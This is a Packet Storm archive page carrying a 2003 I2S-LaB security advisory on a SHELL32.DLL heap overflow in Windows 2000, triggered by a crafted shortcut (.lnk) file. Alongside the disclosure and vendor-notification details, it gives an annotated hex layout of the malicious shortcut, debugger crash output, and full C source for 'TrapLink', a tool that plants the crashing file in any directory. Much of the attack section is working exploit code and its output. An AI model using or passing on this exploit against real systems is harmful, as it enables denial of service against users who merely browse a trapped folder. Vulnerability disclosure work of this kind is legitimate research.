what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

I2S-LAB-10-15-03.Shell32-Do.txt

I2S-LAB-10-15-03.Shell32-Do.txt
Posted Dec 5, 2003
Authored by I2S-LaB | Site I2S-LaB.com

I2S LAB Security Advisory - A malicious attacker can utilize any type of media against the SHELL32.DLL library to cause a massive denial of service. Microsoft Windows 2000 versions SP4 and below are affected. Full research and exploit provided. The next service pack released will have this fixed.

tags | exploit, denial of service
systems | windows
SHA-256 | cda832a63a727038ccbcd93d3c2b509947c91a0f82ff179c79054ca5a7f486b9

I2S-LAB-10-15-03.Shell32-Do.txt

Change Mirror Download
###########################################################################################

~ I2S LAB Security Advisory ~

###########################################################################################
http://www.I2S-LAB.com

Date : 12 / 03 / 2003

Affected systems : Microsoft Windows 2000 SP4 and below

Vendor : http://www.microsoft.com

Issue : Attackers can turn a media (directory, drive, mail, ...) into a remote bomb crashing any application
which would try to acces it using SHELL32.DLL library (explorer, IE, outlook).


Description
___________

SHELL32.DLL is a library which contains windows system functions used to open web pages, documents and
obtain informations on file associations.

That library is used by most standard applications to browse directories to search for a specific file
(a perfect example being the FILE->Open menu command available in most applications).


Technical Details
_________________

As a user browses through his hard-drive, Windows automatically analyses every file of the current directory,
so as to allow the system to display the matching icon as well as file informations.

When Windows must analyse a shortcut (*.lnk), the system determines the properties of the file indicated by the link
using its structure (see: The Windows Shortcut File Format at http://www.I2S-LAB.com/Papers/The_Windows_Shortcut_File_Format.pdf).

Here is the structure of a windows link as we have designed it:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-------------------------------------------------------------------+
| Shortcut HEADER |
+-------------------------------------------------------------------+
00000000 4C00 0000 L... 'L' Magic value

00000004 0114 0200 .... GUID of shurtcut files
00000008 0000 0000 ....
00000008 C000 0000 ....
00000010 0000 0046 ...F

00000014 8900 0000 .... Flag

00000018 2000 0000 ... File attribute

0000001C A0C3 D5A8 .... Time 1
00000020 478E C301 G...

00000024 A0C3 D5A8 .... Time 2
00000028 478E C301 G...

0000002C A0C3 D5A8 .... Time 3
00000030 478E C301 G...

00000034 0000 0000 .... File length (here 0 bytes)
00000038 0000 0000 .... Icone number (no icon for us)
0000003C 0100 0000 .... Normal window
00000040 0000 0000 .... shortcut (no)
00000044 0000 0000 .... unknow/reserved
00000048 0000 0000 .... unknow/reserved


+-------------------------------------------------------------------+
| Item Id List |
+-------------------------------------------------------------------+

0000004C 4600 F. Size of item id list

+-------------------------------------------------------------------+
| First item |
+-------------------------------------------------------------------+

0000004E 1400 .. Lenght of first item
00000050 1F50 .P ???
00000052 E04F D020 .O. File lenght
00000056 EA3A 6910 .:i. ???

+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+

0000005A A2D8 0800 2B30 309D 1900 2343 3A5C 0000 ....+00...#C:\..
0000006A 0000 0000 0000 0000 0000 0000 0000 0051 ...............Q
0000007A 8417 0032 0000 0000 0049 2F87 4B20 006B ...2.....I/.K .k
0000008A 7574 2E74 7874 0000 ut.txt..

+-------------------------------------------------------------------+
| vulnerable bytes |
+-------------------------------------------------------------------+

00000092 0000 0900 .... name lenght
00000096 2E00 ..

00000098 5C00 6B00 7500 7400 2E00 7400 7800 7400 \.k.u.t...t.x.t. name in wide char `


+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+

000000A8 6000 0000 0300 00A0 5800 0000 0000 0000 `.......X.......
000000B8 6932 732D 7732 6B00 0000 0000 0000 0000 i2s-w2k.........
000000C8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000D8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
000000E8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000F8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
00000108 0000 0000 00 .....

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

If we modify the name length at the offset 0x92, SHELL32.DLL will cause an access violation error,
because text was about to be written outside of the the buffer allocated on the heap for this operation.


demonstration
_____________

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>mkdir crash-test

C:\>TrapLink.exe c:\crash-test
################################
TrapLink SHELL32.dll DoS exploit
################################
By I2S-LAB Team.

http://www.I2S-LaB.com

c:\crash-test is now trapped with a malicious LNK file

C:\>start explorer.exe c:\crash-test


(618.408): Access violation - code c0000005 (!!! second chance !!!)

eax=0013ffe0 ebx=70c18871 ecx=00003ee0 edx=00012eba esi=0012a000 edi=00143318
eip=77583411 esp=03e5ea8c ebp=03e5eab8 iopl=0 nv up ei pl nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000213

*** ERROR: Symbol file could not be found.
Defaulted to export symbols for C:\WINNT\system32\SHELL32.dll - SHELL32!Ordinal18+0x25:
77583411 f3a5 rep movsd ds:0012a000=???????? es:00143318=00000065


775833ff e89effffff call SHELL32!Ordinal196 (775833a2)
77583404 85c0 test eax,eax
77583406 7412 jz SHELL32!Ordinal18+0x2e (7758341a)
77583408 8bcf mov ecx,edi
7758340a 8bf8 mov edi,eax
7758340c 8bd1 mov edx,ecx
7758340e c1e902 shr ecx,0x2
77583411 f3a5 rep movsd ds:000f8000=???????? es:00107040=00000000 <-- crash
77583413 8bca mov ecx,edx
77583415 83e103 and ecx,0x3
77583418 f3a4 rep movsb
7758341a 5f pop edi
7758341b 5e pop esi
7758341c c20400 ret 0x4


Exploits
________

/****************************************
* TrapLink for SHELL32.DLL DoS Exploit *
****************************************
Discovered & coded by I2S-LaB

________________________________________

URL : http://www.I2S-LaB.com
MAIL: contact[at]I2S-LaB.com
________________________________________

*****************************************/

#include <windows.h>

void main (int argc, char *argv[])
{

HANDLE TrapFile;
DWORD NumberOfBytesWritten;
unsigned char LnkCrash[] =

"\x4C\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00"
"\x00\x00\x00\x46\x89\x00\x00\x00\x20\x00\x00\x00\xA0\xC3\xD5\xA8"
"\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8"
"\x47\x8E\xC3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x00\x14\x00"
"\x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30"
"\x30\x9D\x19\x00\x23\x43\x3A\x5C\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x51\x84\x17\x00\x32\x00\x00"
"\x00\x00\x00\x49\x2F\x87\x4B\x20\x00\x6B\x75\x74\x2E\x74\x78\x74"
"\x00\x00\xFF\xFF\x09\x00\x2E\x00\x5C\x00\x6B\x00\x75\x00\x74\x00"
"\x2E\x00\x74\x00\x78\x00\x74\x00\x60\x00\x00\x00\x03\x00\x00\xA0"
"\x58\x00\x00\x00\x00\x00\x00\x00\x69\x32\x73\x2D\x77\x32\x6B\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
"\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
"\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
"\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
"\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x00\x00\x00\x00";

printf ("################################\n"
"TrapLink SHELL32.dll DoS exploit\n"
"################################\n"
"By I2S-LAB Team.\n\n"
"http://www.I2S-LaB.com\n\n" );

if (!argv[1])
printf ("Usage : TrapLink <path to trap>\n", argv[0]);

else
{
if ( !SetCurrentDirectory(argv[1]) )
printf ("Error : %s is not a valid directory to trap\n", argv[1] );
else
{
TrapFile = CreateFile("I2S-Crash.lnk",
GENERIC_WRITE, 0,
NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL );

if (TrapFile == INVALID_HANDLE_VALUE)
printf ("Error : cannot create malicious file.\n");

else
{
WriteFile (TrapFile, LnkCrash, sizeof (LnkCrash), &NumberOfBytesWritten, NULL);
printf ("%s is now trapped with a malicious LNK file\n", argv[1] );
}
}
}
}


Solution
________

Microsoft was notified on 11/17/2003 and have agreed to fix this as part of the next service pack.

credits
_______


Aurélien BOUDOUX - aurelien[at]I2S-LaB.com
Fred CHAVEROT - fred[at]I2S-LaB.com
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close